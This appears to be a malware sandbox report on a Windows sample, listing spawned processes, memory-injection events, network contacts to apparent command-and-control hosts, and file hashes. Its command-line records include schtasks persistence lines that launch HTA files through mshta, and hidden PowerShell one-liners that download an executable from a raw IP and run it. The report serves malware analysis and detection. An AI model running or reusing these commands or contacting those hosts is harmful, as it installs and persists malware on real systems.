N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\djrq\nbiciq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2988 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\cmd.exe
PID 2988 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\cmd.exe
PID 2988 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\cmd.exe
PID 2988 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\cmd.exe
PID 2988 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\mshta.exe
PID 2988 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\mshta.exe
PID 2988 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\mshta.exe
PID 2988 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\mshta.exe
PID 3004 wrote to memory of 2068 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3004 wrote to memory of 2068 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3004 wrote to memory of 2068 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3004 wrote to memory of 2068 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2064 wrote to memory of 1864 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2064 wrote to memory of 1864 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2064 wrote to memory of 1864 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2064 wrote to memory of 1864 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1864 wrote to memory of 2780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
PID 1864 wrote to memory of 2780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
PID 1864 wrote to memory of 2780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
PID 1864 wrote to memory of 2780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
PID 2780 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2780 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2780 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2780 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1936 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 1936 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 1936 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 1936 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Windows\SysWOW64\WerFault.exe
PID 2936 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Windows\SysWOW64\WerFault.exe
PID 2936 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Windows\SysWOW64\WerFault.exe
PID 2936 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Windows\SysWOW64\WerFault.exe
PID 1936 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
PID 1936 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
PID 1936 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
PID 1936 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
PID 1936 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 1936 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 1936 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 1936 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 2296 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe
PID 2296 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe
PID 2296 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe
PID 2296 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe
PID 2652 wrote to memory of 1864 N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe
PID 2652 wrote to memory of 1864 N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe
PID 2652 wrote to memory of 1864 N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe
PID 2652 wrote to memory of 1864 N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe
PID 2652 wrote to memory of 2676 N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe C:\Windows\SysWOW64\WerFault.exe
PID 2652 wrote to memory of 2676 N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe C:\Windows\SysWOW64\WerFault.exe
PID 2652 wrote to memory of 2676 N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe

"C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE

"C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 500

C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe

"C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe"

C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe

"C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe" -burn.filehandle.attached=216 -burn.filehandle.self=212

C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe

C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 208

C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe

"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"

C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 1200

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 1036

C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe

"C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe"

C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe

"C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe"

C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 1216

C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe

"C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe"

C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe

"C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe

"C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe"

C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe

"C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe

"C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2336 -s 852

C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe

"C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe"

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe

"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"

C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe

"C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn zlcjtmaYQKF /tr "mshta C:\Users\Admin\AppData\Local\Temp\I8dYGpBlS.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\I8dYGpBlS.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn zlcjtmaYQKF /tr "mshta C:\Users\Admin\AppData\Local\Temp\I8dYGpBlS.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE

"C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\10097720121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "O5x0ImaVemy" /tr "mshta \"C:\Temp\8dw7RzrvO.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\8dw7RzrvO.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\system32\taskeng.exe

taskeng.exe {0102F77C-CFAE-4625-AABC-402260BBCF85} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]

C:\ProgramData\djrq\nbiciq.exe

C:\ProgramData\djrq\nbiciq.exe

C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe

"C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

Network

Country Destination Domain Proto
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 explorebieology.run udp
US 104.21.31.208:443 explorebieology.run tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
US 8.8.8.8:53 codxefusion.top udp
US 172.67.212.102:443 codxefusion.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 104.21.68.89:443 biochextryhub.bet tcp
N/A 127.0.0.1:49647 tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
US 8.8.8.8:53 drunkeflavorz.pw udp
US 104.21.31.208:443 explorebieology.run tcp
RU 185.215.113.16:80 185.215.113.16 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp

Files

C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta

MD5 42bcecbc4a9d0c9e72120f0a60102147
SHA1 026d375bc2a684027fb8532af83ce2991509e1f1
SHA256 303332f5d6160d3604c26f26245225fcdb46887b69f741b346b35948cbb1b23b
SHA512 d6438e784658959e18c3b867bac7e406131011dc5146db4ce9781469e4cabee4630dd6b79106b7b507fe03e748a51516855dcae59f4ac0b2ab29416f339c4498

\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE

MD5 3147e388f1f2ad94f26aee55a4267b8c
SHA1 b3dfd5bb152b1b8e338586ea1e2d240cde6503b3
SHA256 49ac9312c49ff99d5af392d17450747038fcbd6f319ebf981916fcf44120aa2b
SHA512 720b48b08c502c153ecdaeb6fa8a2e374187a71655a88493dc70b266fe16ce88d342aaceefbe5a35fa9db93911510baee7fb578786e44ae6da637369f56443e9

memory/2780-15-0x0000000000CC0000-0x000000000115F000-memory.dmp

memory/1864-14-0x00000000064C0000-0x000000000695F000-memory.dmp

memory/1864-12-0x00000000064C0000-0x000000000695F000-memory.dmp

memory/1936-32-0x0000000000F00000-0x000000000139F000-memory.dmp

memory/2780-31-0x0000000006D40000-0x00000000071DF000-memory.dmp

memory/2780-29-0x0000000000CC0000-0x000000000115F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/2936-50-0x00000000011D0000-0x0000000001230000-memory.dmp

memory/2460-69-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2460-70-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2460-68-0x0000000000400000-0x0000000000429000-memory.dmp

